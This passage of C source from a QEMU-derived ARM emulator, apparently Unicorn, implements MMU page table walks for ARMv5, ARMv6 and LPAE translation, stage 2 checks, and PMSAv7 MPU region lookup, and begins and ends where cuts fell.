Translation table walk disabled for TTBR1 */ return false; } *table = regime_ttbr(env, mmu_idx, 1) & 0xffffc000; } else { if (tcr->raw_tcr & TTBCR_PD0) { /* Translation table walk disabled for TTBR0 */ return false; } *table = regime_ttbr(env, mmu_idx, 0) & tcr->base_mask; } *table |= (address >> 18) & 0x3ffc; return true; } /* Translate a S1 pagetable walk through S2 if needed. */ static hwaddr S1_ptw_translate(CPUARMState *env, ARMMMUIdx mmu_idx, hwaddr addr, MemTxAttrs txattrs, ARMMMUFaultInfo *fi) { if (arm_mmu_idx_is_stage1_of_2(mmu_idx) && !regime_translation_disabled(env, ARMMMUIdx_Stage2)) { target_ulong s2size; hwaddr s2pa; int s2prot; int ret; ARMCacheAttrs cacheattrs = { 0 }; ARMCacheAttrs *pcacheattrs = NULL; if (env->cp15.hcr_el2 & HCR_PTW) { /* * PTW means we must fault if this S1 walk touches S2 Device * memory; otherwise we don't care about the attributes and can * save the S2 translation the effort of computing them. */ pcacheattrs = &cacheattrs; } ret = get_phys_addr_lpae(env, addr, 0, ARMMMUIdx_Stage2, &s2pa, &txattrs, &s2prot, &s2size, fi, pcacheattrs); if (ret) { assert(fi->type != ARMFault_None); fi->s2addr = addr; fi->stage2 = true; fi->s1ptw = true; return ~0; } if (pcacheattrs && (pcacheattrs->attrs & 0xf0) == 0) { /* Access was to Device memory: generate Permission fault */ fi->type = ARMFault_Permission; fi->s2addr = addr; fi->stage2 = true; fi->s1ptw = true; return ~0; } addr = s2pa; } return addr; } /* All loads done in the course of a page table walk go through here. */ static uint32_t arm_ldl_ptw(CPUState *cs, hwaddr addr, bool is_secure, ARMMMUIdx mmu_idx, ARMMMUFaultInfo *fi) { struct uc_struct *uc = cs->uc; ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult result = MEMTX_OK; AddressSpace *as; uint32_t data; attrs.secure = is_secure; as = arm_addressspace(cs, attrs); addr = S1_ptw_translate(env, mmu_idx, addr, attrs, fi); if (fi->s1ptw) { return 0; } if (regime_translation_big_endian(env, mmu_idx)) { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldl_be, UNICORN_ARCH_POSTFIX)(uc, as, addr, attrs, &result); #else data = address_space_ldl_be(uc, as, addr, attrs, &result); #endif } else { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldl_le, UNICORN_ARCH_POSTFIX)(uc, as, addr, attrs, &result); #else data = address_space_ldl_le(uc, as, addr, attrs, &result); #endif } if (result == MEMTX_OK) { return data; } fi->type = ARMFault_SyncExternalOnWalk; fi->ea = arm_extabort_type(result); return 0; } static uint64_t arm_ldq_ptw(CPUState *cs, hwaddr addr, bool is_secure, ARMMMUIdx mmu_idx, ARMMMUFaultInfo *fi) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; MemTxAttrs attrs = { 0 }; MemTxResult result = MEMTX_OK; AddressSpace *as; uint64_t data; attrs.secure = is_secure; as = arm_addressspace(cs, attrs); addr = S1_ptw_translate(env, mmu_idx, addr, attrs, fi); if (fi->s1ptw) { return 0; } if (regime_translation_big_endian(env, mmu_idx)) { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldq_be, UNICORN_ARCH_POSTFIX)(cs->uc, as, addr, attrs, &result); #else data = address_space_ldq_be(cs->uc, as, addr, attrs, &result); #endif } else { #ifdef UNICORN_ARCH_POSTFIX data = glue(address_space_ldq_le, UNICORN_ARCH_POSTFIX)(cs->uc, as, addr, attrs, &result); #else data = address_space_ldq_le(cs->uc, as, addr, attrs, &result); #endif } if (result == MEMTX_OK) { return data; } fi->type = ARMFault_SyncExternalOnWalk; fi->ea = arm_extabort_type(result); return 0; } static bool get_phys_addr_v5(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { CPUState *cs = env_cpu(env); int level = 1; uint32_t table; uint32_t desc; int type; int ap; int domain = 0; int domain_prot; hwaddr phys_addr; uint32_t dacr; /* Pagetable walk. */ /* Lookup l1 descriptor. */ if (!get_level1_table_address(env, mmu_idx, &table, address)) { /* Section translation fault if page walk is disabled by PD0 or PD1 */ fi->type = ARMFault_Translation; goto do_fault; } desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } type = (desc & 3); domain = (desc >> 5) & 0x0f; if (regime_el(env, mmu_idx) == 1) { dacr = env->cp15.dacr_ns; } else { dacr = env->cp15.dacr_s; } domain_prot = (dacr >> (domain * 2)) & 3; if (type == 0) { /* Section translation fault. */ fi->type = ARMFault_Translation; goto do_fault; } if (type != 2) { level = 2; } if (domain_prot == 0 || domain_prot == 2) { fi->type = ARMFault_Domain; goto do_fault; } if (type == 2) { /* 1Mb section. */ phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); ap = (desc >> 10) & 3; *page_size = 1024 * 1024; } else { /* Lookup l2 entry. */ if (type == 1) { /* Coarse pagetable. */ table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); } else { /* Fine pagetable. */ table = (desc & 0xfffff000) | ((address >> 8) & 0xffc); } desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } switch (desc & 3) { case 0: /* Page translation fault. */ fi->type = ARMFault_Translation; goto do_fault; case 1: /* 64k page. */ phys_addr = (desc & 0xffff0000) | (address & 0xffff); ap = (desc >> (4 + ((address >> 13) & 6))) & 3; *page_size = 0x10000; break; case 2: /* 4k page. */ phys_addr = (desc & 0xfffff000) | (address & 0xfff); ap = (desc >> (4 + ((address >> 9) & 6))) & 3; *page_size = 0x1000; break; case 3: /* 1k page, or ARMv6/XScale "extended small (4k) page" */ if (type == 1) { /* ARMv6/XScale extended small page format */ if (arm_feature(env, ARM_FEATURE_XSCALE) || arm_feature(env, ARM_FEATURE_V6)) { phys_addr = (desc & 0xfffff000) | (address & 0xfff); *page_size = 0x1000; } else { /* UNPREDICTABLE in ARMv5; we choose to take a * page translation fault. */ fi->type = ARMFault_Translation; goto do_fault; } } else { phys_addr = (desc & 0xfffffc00) | (address & 0x3ff); *page_size = 0x400; } ap = (desc >> 4) & 3; break; default: /* Never happens, but compiler isn't smart enough to tell. */ abort(); } } *prot = ap_to_rw_prot(env, mmu_idx, ap, domain_prot); *prot |= *prot ? PAGE_EXEC : 0; if (!(*prot & (1 << access_type))) { /* Access permission fault. */ fi->type = ARMFault_Permission; goto do_fault; } *phys_ptr = phys_addr; return false; do_fault: fi->domain = domain; fi->level = level; return true; } static bool get_phys_addr_v6(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *attrs, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { CPUState *cs = env_cpu(env); int level = 1; uint32_t table; uint32_t desc; uint32_t xn; uint32_t pxn = 0; int type; int ap; int domain = 0; int domain_prot; hwaddr phys_addr; uint32_t dacr; bool ns; /* Pagetable walk. */ /* Lookup l1 descriptor. */ if (!get_level1_table_address(env, mmu_idx, &table, address)) { /* Section translation fault if page walk is disabled by PD0 or PD1 */ fi->type = ARMFault_Translation; goto do_fault; } desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } type = (desc & 3); if (type == 0 || (type == 3 && !arm_feature(env, ARM_FEATURE_PXN))) { /* Section translation fault, or attempt to use the encoding * which is Reserved on implementations without PXN. */ fi->type = ARMFault_Translation; goto do_fault; } if ((type == 1) || !(desc & (1 << 18))) { /* Page or Section. */ domain = (desc >> 5) & 0x0f; } if (regime_el(env, mmu_idx) == 1) { dacr = env->cp15.dacr_ns; } else { dacr = env->cp15.dacr_s; } if (type == 1) { level = 2; } domain_prot = (dacr >> (domain * 2)) & 3; if (domain_prot == 0 || domain_prot == 2) { /* Section or Page domain fault */ fi->type = ARMFault_Domain; goto do_fault; } if (type != 1) { if (desc & (1 << 18)) { /* Supersection. */ phys_addr = (desc & 0xff000000) | (address & 0x00ffffff); phys_addr |= (uint64_t)extract32(desc, 20, 4) << 32; phys_addr |= (uint64_t)extract32(desc, 5, 4) << 36; *page_size = 0x1000000; } else { /* Section. */ phys_addr = (desc & 0xfff00000) | (address & 0x000fffff); *page_size = 0x100000; } ap = ((desc >> 10) & 3) | ((desc >> 13) & 4); xn = desc & (1 << 4); pxn = desc & 1; ns = extract32(desc, 19, 1); } else { if (arm_feature(env, ARM_FEATURE_PXN)) { pxn = (desc >> 2) & 1; } ns = extract32(desc, 3, 1); /* Lookup l2 entry. */ table = (desc & 0xfffffc00) | ((address >> 10) & 0x3fc); desc = arm_ldl_ptw(cs, table, regime_is_secure(env, mmu_idx), mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } ap = ((desc >> 4) & 3) | ((desc >> 7) & 4); switch (desc & 3) { case 0: /* Page translation fault. */ fi->type = ARMFault_Translation; goto do_fault; case 1: /* 64k page. */ phys_addr = (desc & 0xffff0000) | (address & 0xffff); xn = desc & (1 << 15); *page_size = 0x10000; break; case 2: case 3: /* 4k page. */ phys_addr = (desc & 0xfffff000) | (address & 0xfff); xn = desc & 1; *page_size = 0x1000; break; default: /* Never happens, but compiler isn't smart enough to tell. */ abort(); } } if (domain_prot == 3) { *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; } else { if (pxn && !regime_is_user(env, mmu_idx)) { xn = 1; } if (xn && access_type == MMU_INST_FETCH) { fi->type = ARMFault_Permission; goto do_fault; } if (arm_feature(env, ARM_FEATURE_V6K) && (regime_sctlr(env, mmu_idx) & SCTLR_AFE)) { /* The simplified model uses AP[0] as an access control bit. */ if ((ap & 1) == 0) { /* Access flag fault. */ fi->type = ARMFault_AccessFlag; goto do_fault; } *prot = simple_ap_to_rw_prot(env, mmu_idx, ap >> 1); } else { *prot = ap_to_rw_prot(env, mmu_idx, ap, domain_prot); } if (*prot && !xn) { *prot |= PAGE_EXEC; } if (!(*prot & (1 << access_type))) { /* Access permission fault. */ fi->type = ARMFault_Permission; goto do_fault; } } if (ns) { /* The NS bit will (as required by the architecture) have no effect if * the CPU doesn't support TZ or this is a non-secure translation * regime, because the attribute will already be non-secure. */ attrs->secure = false; } *phys_ptr = phys_addr; return false; do_fault: fi->domain = domain; fi->level = level; return true; } /* * check_s2_mmu_setup * @cpu: ARMCPU * @is_aa64: True if the translation regime is in AArch64 state * @startlevel: Suggested starting level * @inputsize: Bitsize of IPAs * @stride: Page-table stride (See the ARM ARM) * * Returns true if the suggested S2 translation parameters are OK and * false otherwise. */ static bool check_s2_mmu_setup(ARMCPU *cpu, bool is_aa64, int level, int inputsize, int stride) { const int grainsize = stride + 3; int startsizecheck; /* Negative levels are never allowed. */ if (level < 0) { return false; } startsizecheck = inputsize - ((3 - level) * stride + grainsize); if (startsizecheck < 1 || startsizecheck > stride + 4) { return false; } if (is_aa64) { CPUARMState *env = &cpu->env; unsigned int pamax = arm_pamax(cpu); switch (stride) { case 13: /* 64KB Pages. */ if (level == 0 || (level == 1 && pamax <= 42)) { return false; } break; case 11: /* 16KB Pages. */ if (level == 0 || (level == 1 && pamax <= 40)) { return false; } break; case 9: /* 4KB Pages. */ if (level == 0 && pamax <= 42) { return false; } break; default: g_assert_not_reached(); break; } /* Inputsize checks. */ if (inputsize > pamax && (arm_el_is_aa64(env, 1) || inputsize > 40)) { /* This is CONSTRAINED UNPREDICTABLE and we choose to fault. */ return false; } } else { /* AArch32 only supports 4KB pages. Assert on that. */ assert(stride == 9); if (level == 0) { return false; } } return true; } /* Translate from the 4-bit stage 2 representation of * memory attributes (without cache-allocation hints) to * the 8-bit representation of the stage 1 MAIR registers * (which includes allocation hints). * * ref: shared/translation/attrs/S2AttrDecode() * .../S2ConvertAttrsHints() */ static uint8_t convert_stage2_attrs(CPUARMState *env, uint8_t s2attrs) { uint8_t hiattr = extract32(s2attrs, 2, 2); uint8_t loattr = extract32(s2attrs, 0, 2); uint8_t hihint = 0, lohint = 0; if (hiattr != 0) { /* normal memory */ if ((env->cp15.hcr_el2 & HCR_CD) != 0) { /* cache disabled */ hiattr = loattr = 1; /* non-cacheable */ } else { if (hiattr != 1) { /* Write-through or write-back */ hihint = 3; /* RW allocate */ } if (loattr != 1) { /* Write-through or write-back */ lohint = 3; /* RW allocate */ } } } return (hiattr << 6) | (hihint << 4) | (loattr << 2) | lohint; } static int aa64_va_parameter_tbi(uint64_t tcr, ARMMMUIdx mmu_idx) { if (regime_has_2_ranges(mmu_idx)) { return extract64(tcr, 37, 2); } else if (mmu_idx == ARMMMUIdx_Stage2) { return 0; /* VTCR_EL2 */ } else { /* Replicate the single TBI bit so we always have 2 bits. */ return extract32(tcr, 20, 1) * 3; } } static int aa64_va_parameter_tbid(uint64_t tcr, ARMMMUIdx mmu_idx) { if (regime_has_2_ranges(mmu_idx)) { return extract64(tcr, 51, 2); } else if (mmu_idx == ARMMMUIdx_Stage2) { return 0; /* VTCR_EL2 */ } else { /* Replicate the single TBID bit so we always have 2 bits. */ return extract32(tcr, 29, 1) * 3; } } ARMVAParameters aa64_va_parameters(CPUARMState *env, uint64_t va, ARMMMUIdx mmu_idx, bool data) { uint64_t tcr = regime_tcr(env, mmu_idx)->raw_tcr; bool epd, hpd, using16k, using64k; int select, tsz, tbi; if (!regime_has_2_ranges(mmu_idx)) { select = 0; tsz = extract32(tcr, 0, 6); using64k = extract32(tcr, 14, 1); using16k = extract32(tcr, 15, 1); if (mmu_idx == ARMMMUIdx_Stage2) { /* VTCR_EL2 */ hpd = false; } else { hpd = extract32(tcr, 24, 1); } epd = false; } else { /* * Bit 55 is always between the two regions, and is canonical for * determining if address tagging is enabled. */ select = extract64(va, 55, 1); if (!select) { tsz = extract32(tcr, 0, 6); epd = extract32(tcr, 7, 1); using64k = extract32(tcr, 14, 1); using16k = extract32(tcr, 15, 1); hpd = extract64(tcr, 41, 1); } else { int tg = extract32(tcr, 30, 2); using16k = tg == 1; using64k = tg == 3; tsz = extract32(tcr, 16, 6); epd = extract32(tcr, 23, 1); hpd = extract64(tcr, 42, 1); } } tsz = MIN(tsz, 39); /* TODO: ARMv8.4-TTST */ tsz = MAX(tsz, 16); /* TODO: ARMv8.2-LVA */ /* Present TBI as a composite with TBID. */ tbi = aa64_va_parameter_tbi(tcr, mmu_idx); if (!data) { tbi &= ~aa64_va_parameter_tbid(tcr, mmu_idx); } tbi = (tbi >> select) & 1; return (ARMVAParameters) { .tsz = tsz, .select = select, .tbi = tbi, .epd = epd, .hpd = hpd, .using16k = using16k, .using64k = using64k, }; } static ARMVAParameters aa32_va_parameters(CPUARMState *env, uint32_t va, ARMMMUIdx mmu_idx) { uint64_t tcr = regime_tcr(env, mmu_idx)->raw_tcr; uint32_t el = regime_el(env, mmu_idx); int select, tsz; bool epd, hpd; if (mmu_idx == ARMMMUIdx_Stage2) { /* VTCR */ bool sext = extract32(tcr, 4, 1); bool sign = extract32(tcr, 3, 1); /* * If the sign-extend bit is not the same as t0sz[3], the result * is unpredictable. Flag this as a guest error. */ if (sign != sext) { qemu_log_mask(LOG_GUEST_ERROR, "AArch32: VTCR.S / VTCR.T0SZ[3] mismatch\n"); } tsz = sextract32(tcr, 0, 4) + 8; select = 0; hpd = false; epd = false; } else if (el == 2) { /* HTCR */ tsz = extract32(tcr, 0, 3); select = 0; hpd = extract64(tcr, 24, 1); epd = false; } else { int t0sz = extract32(tcr, 0, 3); int t1sz = extract32(tcr, 16, 3); if (t1sz == 0) { select = va > (0xffffffffu >> t0sz); } else { /* Note that we will detect errors later. */ select = va >= ~(0xffffffffu >> t1sz); } if (!select) { tsz = t0sz; epd = extract32(tcr, 7, 1); hpd = extract64(tcr, 41, 1); } else { tsz = t1sz; epd = extract32(tcr, 23, 1); hpd = extract64(tcr, 42, 1); } /* For aarch32, hpd0 is not enabled without t2e as well. */ hpd &= extract32(tcr, 6, 1); } return (ARMVAParameters) { .tsz = tsz, .select = select, .epd = epd, .hpd = hpd, }; } static bool get_phys_addr_lpae(CPUARMState *env, target_ulong address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, MemTxAttrs *txattrs, int *prot, target_ulong *page_size_ptr, ARMMMUFaultInfo *fi, ARMCacheAttrs *cacheattrs) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); /* Read an LPAE long-descriptor translation table. */ ARMFaultType fault_type = ARMFault_Translation; uint32_t level; ARMVAParameters param; uint64_t ttbr; hwaddr descaddr, indexmask, indexmask_grainsize; uint32_t tableattrs; target_ulong page_size; uint32_t attrs; int32_t stride; int addrsize, inputsize; TCR *tcr = regime_tcr(env, mmu_idx); int ap, ns, xn, pxn; uint32_t el = regime_el(env, mmu_idx); uint64_t descaddrmask; bool aarch64 = arm_el_is_aa64(env, el); bool guarded = false; /* TODO: This code does not support shareability levels. */ if (aarch64) { param = aa64_va_parameters(env, address, mmu_idx, access_type != MMU_INST_FETCH); level = 0; addrsize = 64 - 8 * param.tbi; inputsize = 64 - param.tsz; } else { param = aa32_va_parameters(env, address, mmu_idx); level = 1; addrsize = (mmu_idx == ARMMMUIdx_Stage2 ? 40 : 32); inputsize = addrsize - param.tsz; } /* * We determined the region when collecting the parameters, but we * have not yet validated that the address is valid for the region. * Extract the top bits and verify that they all match select. * * For aa32, if inputsize == addrsize, then we have selected the * region by exclusion in aa32_va_parameters and there is no more * validation to do here. */ if (inputsize < addrsize) { target_ulong top_bits = sextract64(address, inputsize, addrsize - inputsize); #ifdef _MSC_VER if (param.select != (0 - top_bits)) { #else if (-top_bits != param.select) { #endif /* The gap between the two regions is a Translation fault */ fault_type = ARMFault_Translation; goto do_fault; } } if (param.using64k) { stride = 13; } else if (param.using16k) { stride = 11; } else { stride = 9; } /* Note that QEMU ignores shareability and cacheability attributes, * so we don't need to do anything with the SH, ORGN, IRGN fields * in the TTBCR. Similarly, TTBCR:A1 selects whether we get the * ASID from TTBR0 or TTBR1, but QEMU's TLB doesn't currently * implement any ASID-like capability so we can ignore it (instead * we will always flush the TLB any time the ASID is changed). */ ttbr = regime_ttbr(env, mmu_idx, param.select); /* Here we should have set up all the parameters for the translation: * inputsize, ttbr, epd, stride, tbi */ if (param.epd) { /* Translation table walk disabled => Translation fault on TLB miss * Note: This is always 0 on 64-bit EL2 and EL3. */ goto do_fault; } if (mmu_idx != ARMMMUIdx_Stage2) { /* The starting level depends on the virtual address size (which can * be up to 48 bits) and the translation granule size. It indicates * the number of strides (stride bits at a time) needed to * consume the bits of the input address. In the pseudocode this is: * level = 4 - RoundUp((inputsize - grainsize) / stride) * where their 'inputsize' is our 'inputsize', 'grainsize' is * our 'stride + 3' and 'stride' is our 'stride'. * Applying the usual "rounded up m/n is (m+n-1)/n" and simplifying: * = 4 - (inputsize - stride - 3 + stride - 1) / stride * = 4 - (inputsize - 4) / stride; */ level = 4 - (inputsize - 4) / stride; } else { /* For stage 2 translations the starting level is specified by the * VTCR_EL2.SL0 field (whose interpretation depends on the page size) */ uint32_t sl0 = extract32(tcr->raw_tcr, 6, 2); uint32_t startlevel; bool ok; if (!aarch64 || stride == 9) { /* AArch32 or 4KB pages */ startlevel = 2 - sl0; } else { /* 16KB or 64KB pages */ startlevel = 3 - sl0; } /* Check that the starting level is valid. */ ok = check_s2_mmu_setup(cpu, aarch64, startlevel, inputsize, stride); if (!ok) { fault_type = ARMFault_Translation; goto do_fault; } level = startlevel; } indexmask_grainsize = (1ULL << (stride + 3)) - 1; indexmask = (1ULL << (inputsize - (stride * (4 - level)))) - 1; /* Now we can extract the actual base address from the TTBR */ descaddr = extract64(ttbr, 0, 48); /* * We rely on this masking to clear the RES0 bits at the bottom of the TTBR * and also to mask out CnP (bit 0) which could validly be non-zero. */ descaddr &= ~indexmask; /* The address field in the descriptor goes up to bit 39 for ARMv7 * but up to bit 47 for ARMv8, but we use the descaddrmask * up to bit 39 for AArch32, because we don't need other bits in that case * to construct next descriptor address (anyway they should be all zeroes). */ descaddrmask = ((1ull << (aarch64 ? 48 : 40)) - 1) & ~indexmask_grainsize; /* Secure accesses start with the page table in secure memory and * can be downgraded to non-secure at any step. Non-secure accesses * remain non-secure. We implement this by just ORing in the NSTable/NS * bits at each step. */ tableattrs = regime_is_secure(env, mmu_idx) ? 0 : (1 << 4); for (;;) { uint64_t descriptor; bool nstable; descaddr |= (address >> (stride * (4 - level))) & indexmask; descaddr &= ~7ULL; nstable = extract32(tableattrs, 4, 1); descriptor = arm_ldq_ptw(cs, descaddr, !nstable, mmu_idx, fi); if (fi->type != ARMFault_None) { goto do_fault; } if (!(descriptor & 1) || (!(descriptor & 2) && (level == 3))) { /* Invalid, or the Reserved level 3 encoding */ goto do_fault; } descaddr = descriptor & descaddrmask; if ((descriptor & 2) && (level < 3)) { /* Table entry. The top five bits are attributes which may * propagate down through lower levels of the table (and * which are all arranged so that 0 means "no effect", so * we can gather them up by ORing in the bits at each level). */ tableattrs |= extract64(descriptor, 59, 5); level++; indexmask = indexmask_grainsize; continue; } /* Block entry at level 1 or 2, or page entry at level 3. * These are basically the same thing, although the number * of bits we pull in from the vaddr varies. */ page_size = (1ULL << ((stride * (4 - level)) + 3)); descaddr |= (address & (page_size - 1)); /* Extract attributes from the descriptor */ attrs = extract64(descriptor, 2, 10) | (extract64(descriptor, 52, 12) << 10); if (mmu_idx == ARMMMUIdx_Stage2) { /* Stage 2 table descriptors do not include any attribute fields */ break; } /* Merge in attributes from table descriptors */ attrs |= nstable << 3; /* NS */ guarded = extract64(descriptor, 50, 1); /* GP */ if (param.hpd) { /* HPD disables all the table attributes except NSTable. */ break; } attrs |= extract32(tableattrs, 0, 2) << 11; /* XN, PXN */ /* The sense of AP[1] vs APTable[0] is reversed, as APTable[0] == 1 * means "force PL1 access only", which means forcing AP[1] to 0. */ attrs &= ~(extract32(tableattrs, 2, 1) << 4); /* !APT[0] => AP[1] */ attrs |= extract32(tableattrs, 3, 1) << 5; /* APT[1] => AP[2] */ break; } /* Here descaddr is the final physical address, and attributes * are all in attrs. */ fault_type = ARMFault_AccessFlag; if ((attrs & (1 << 8)) == 0) { /* Access flag */ goto do_fault; } ap = extract32(attrs, 4, 2); xn = extract32(attrs, 12, 1); if (mmu_idx == ARMMMUIdx_Stage2) { ns = true; *prot = get_S2prot(env, ap, xn); } else { ns = extract32(attrs, 3, 1); pxn = extract32(attrs, 11, 1); *prot = get_S1prot(env, mmu_idx, aarch64, ap, ns, xn, pxn); } fault_type = ARMFault_Permission; if (!(*prot & (1 << access_type))) { goto do_fault; } if (ns) { /* The NS bit will (as required by the architecture) have no effect if * the CPU doesn't support TZ or this is a non-secure translation * regime, because the attribute will already be non-secure. */ txattrs->secure = false; } /* When in aarch64 mode, and BTI is enabled, remember GP in the IOTLB. */ if (aarch64 && guarded && cpu_isar_feature(aa64_bti, cpu)) { txattrs->target_tlb_bit0 = true; } if (cacheattrs != NULL) { if (mmu_idx == ARMMMUIdx_Stage2) { cacheattrs->attrs = convert_stage2_attrs(env, extract32(attrs, 0, 4)); } else { /* Index into MAIR registers for cache attributes */ uint8_t attrindx = extract32(attrs, 0, 3); uint64_t mair = env->cp15.mair_el[regime_el(env, mmu_idx)]; assert(attrindx <= 7); cacheattrs->attrs = extract64(mair, attrindx * 8, 8); } cacheattrs->shareability = extract32(attrs, 6, 2); } *phys_ptr = descaddr; *page_size_ptr = page_size; return false; do_fault: fi->type = fault_type; fi->level = level; /* Tag the error as S2 for failed S1 PTW at S2 or ordinary S2. */ fi->stage2 = fi->s1ptw || (mmu_idx == ARMMMUIdx_Stage2); return true; } static inline void get_phys_addr_pmsav7_default(CPUARMState *env, ARMMMUIdx mmu_idx, int32_t address, int *prot) { #define XRANGE(a, x, y) (a >=x && a <= y) if (!arm_feature(env, ARM_FEATURE_M)) { *prot = PAGE_READ | PAGE_WRITE; if (XRANGE(address, 0xF0000000, 0xFFFFFFFF)) { if (regime_sctlr(env, mmu_idx) & SCTLR_V) { /* hivecs execing is ok */ *prot |= PAGE_EXEC; } } else if (XRANGE(address, 0x00000000, 0x7FFFFFFF)) { *prot |= PAGE_EXEC; } } else { /* Default system address map for M profile cores. * The architecture specifies which regions are execute-never; * at the MPU level no other checks are defined. */ if (XRANGE(address, 0x00000000, 0x1fffffff) || /* ROM */ XRANGE(address, 0x20000000, 0x3fffffff) || /* SRAM */ XRANGE(address, 0x60000000, 0x7fffffff) || /* RAM */ XRANGE(address, 0x80000000, 0x9fffffff)) /* RAM */ *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; else if (XRANGE(address, 0x40000000, 0x5fffffff) || /* Peripheral */ XRANGE(address, 0xa0000000, 0xbfffffff) || /* Device */ XRANGE(address, 0xc0000000, 0xdfffffff) || /* Device */ XRANGE(address, 0xe0000000, 0xffffffff)) /* System */ *prot = PAGE_READ | PAGE_WRITE; } #undef XRANGE } static bool pmsav7_use_background_region(ARMCPU *cpu, ARMMMUIdx mmu_idx, bool is_user) { /* Return true if we should use the default memory map as a * "background" region if there are no hits against any MPU regions. */ CPUARMState *env = &cpu->env; if (is_user) { return false; } if (arm_feature(env, ARM_FEATURE_M)) { return env->v7m.mpu_ctrl[regime_is_secure(env, mmu_idx)] & R_V7M_MPU_CTRL_PRIVDEFENA_MASK; } else { return regime_sctlr(env, mmu_idx) & SCTLR_BR; } } static inline bool m_is_ppb_region(CPUARMState *env, uint32_t address) { /* True if address is in the M profile PPB region 0xe0000000 - 0xe00fffff */ return arm_feature(env, ARM_FEATURE_M) && extract32(address, 20, 12) == 0xe00; } static inline bool m_is_system_region(CPUARMState *env, uint32_t address) { /* True if address is in the M profile system region * 0xe0000000 - 0xffffffff */ return arm_feature(env, ARM_FEATURE_M) && extract32(address, 29, 3) == 0x7; } static bool get_phys_addr_pmsav7(CPUARMState *env, uint32_t address, MMUAccessType access_type, ARMMMUIdx mmu_idx, hwaddr *phys_ptr, int *prot, target_ulong *page_size, ARMMMUFaultInfo *fi) { struct uc_struct *uc = env->uc; ARMCPU *cpu = env_archcpu(env); int n; bool is_user = regime_is_user(env, mmu_idx); *phys_ptr = address; *page_size = TARGET_PAGE_SIZE; *prot = 0; if (regime_translation_disabled(env, mmu_idx) || m_is_ppb_region(env, address)) { /* MPU disabled or M profile PPB access: use default memory map. * The other case which uses the default memory map in the * v7M ARM ARM pseudocode is exception vector reads from the vector * table. In QEMU those accesses are done in arm_v7m_load_vector(), * which always does a direct read using address_space_ldl(), rather * than going via this function, so we don't need to check that here. */ get_phys_addr_pmsav7_default(env, mmu_idx, address, prot); } else { /* MPU enabled */ for (n = (int)cpu->pmsav7_dregion - 1; n >= 0; n--) { /* region search */ uint32_t base = env->pmsav7.drbar[n]; uint32_t rsize = extract32(env->pmsav7.drsr[n], 1, 5); uint32_t rmask; bool srdis = false; if (!(env->pmsav7.drsr[n] & 0x1)) { continue; } if (!rsize) { qemu_log_mask(LOG_GUEST_ERROR, "DRSR[%d]: Rsize field cannot be 0\n", n); continue; } rsize++; rmask = (1ull << rsize) - 1; if (base & rmask) { qemu_log_mask(LOG_GUEST_ERROR, "DRBAR[%d]: 0x%" PRIx32 " misaligned " "to DRSR region size, mask = 0x%" PRIx32 "\n", n, base, rmask); continue; } if (address < base || address > base + rmask) { /* * Address not in this region. We must check whether the * region covers addresses in the same page as our address. * In that case we must not report a size that covers the * whole page for a subsequent hit against a different MPU * region or the background region, because it would result in * incorrect TLB hits for subsequent accesses to addresses that * are in this MPU region. */ if (ranges_overlap(base, rmask, address & TARGET_PAGE_MASK, TARGET_PAGE_SIZE)) { *page_size = 1; } continue; } /* Region matched */ if (rsize >= 8) { /* no subregions for regions < 256 bytes */ int i, snd; uint32_t srdis_mask; rsize -= 3; /* sub region size (power of 2) */ snd = ((address - base) >> rsize) & 0x7; srdis = extract32(env->pmsav7.drsr[n], snd + 8, 1); srdis_mask = srdis ? 0x3 : 0x0; for (i = 2; i <= 8 && rsize < TARGET_PAGE_BITS; i *= 2) { /* This will check in groups of 2, 4 and then 8, whether * the subregion bits are consistent. rsize is incremented * back up to give the region size, considering consistent * adjacent subregions as one region. Stop testing if rsize * is already big enough for an entire QEMU page. */ int snd_rounded = snd & ~(i - 1); uint32_t srdis_multi = extract32(env->pmsav7.drsr[n], snd_rounded + 8, i); if (srdis_mask ^ srdis_multi) { break; } srdis_mask = (srdis_mask << i) | srdis_mask; rsize++; } } if (srdis) { continue; } if (rsize < TARGET_PAGE_BITS) { *page_size = 1ULL << rsize; } break; } if (n == -1) { /* no hits */ if (!pmsav7_use_background_region(cpu, mmu_idx, is_user)) { /* background fault */ fi->type = ARMFault_Background; return true; } get_phys_addr_pmsav7_default(env, mmu_idx, address, prot); } else { /* a MPU hit! */ uint32_t ap = extract32(env->pmsav7.dracr[n], 8, 3); uint32_t xn = extract32(env->pmsav7.dracr[n], 12, 1); if (m_is_system_region(env, address)) { /* System space is always execute never */ xn = 1; } if (is_user) { /* User mode AP bit decoding */ switch (ap) { case 0: case 1: case 5: break; /* no access */ case 3: *prot |= PAGE_WRITE; /* fall through */ case 2: case 6: *prot |= PAGE_READ | PAGE_EXEC; break; case 7: /* for v7M, same as 6; for R profile a reserved value */ if (arm_feature(env, ARM_FEATURE_M)) { *prot |= PAGE_READ | PAGE_EXEC; break; } /* fall through */ default: qemu_log_mask(LOG_GUEST_ERROR, "DRACR[%d]: Bad value for AP bits: 0x%" PRIx32 "\n", n, ap); } } else { /* Priv. mode AP bits decoding */ switch (ap) { case 0: break; /* no access */ case 1: case 2: case 3: *prot |= PAGE_WRITE; /* fall through */ case 5: case 6: 